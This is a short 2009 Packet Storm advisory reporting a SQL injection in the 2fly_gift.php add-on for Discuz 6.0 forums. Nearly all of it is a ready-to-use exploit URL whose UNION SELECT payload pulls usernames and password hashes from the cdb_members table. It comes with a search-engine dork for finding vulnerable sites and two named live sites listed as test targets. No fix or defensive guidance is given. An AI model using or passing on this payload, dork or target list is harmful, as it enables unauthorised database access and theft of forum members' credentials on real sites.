Discuz 6.0 SQL Injection

2009-08-15T00:00:00
ID PACKETSTORM:80372
Type packetstorm
Reporter Securitylab Security Research
Modified 2009-08-15T00:00:00

Description

                                        
                                            `######################### Securitylab.ir ########################  
# Application Info:  
# Name: Discuz  
# Version: 6.0  
# Website: http://www.discuz.net  
#################################################################  
# Discoverd By: Securitylab.ir  
# Website: http://securitylab.ir  
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir  
#################################################################  
# Vulnerability Info:  
# Type: Sql Injection Vulnerability  
# Risk: Medium  
# Dork: © 2008 - 2009 Powered by discuz inurl:2fly_gift.php  
#===========================================================  
#http://site.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members  
#===========================================================  
#################################################################  
# test:  
# http://www.iacct.cn  
# http://bbs.fpsba.com  
#################################################################  
# Securitylab Security Research Team  
###################################################################  
  
  
`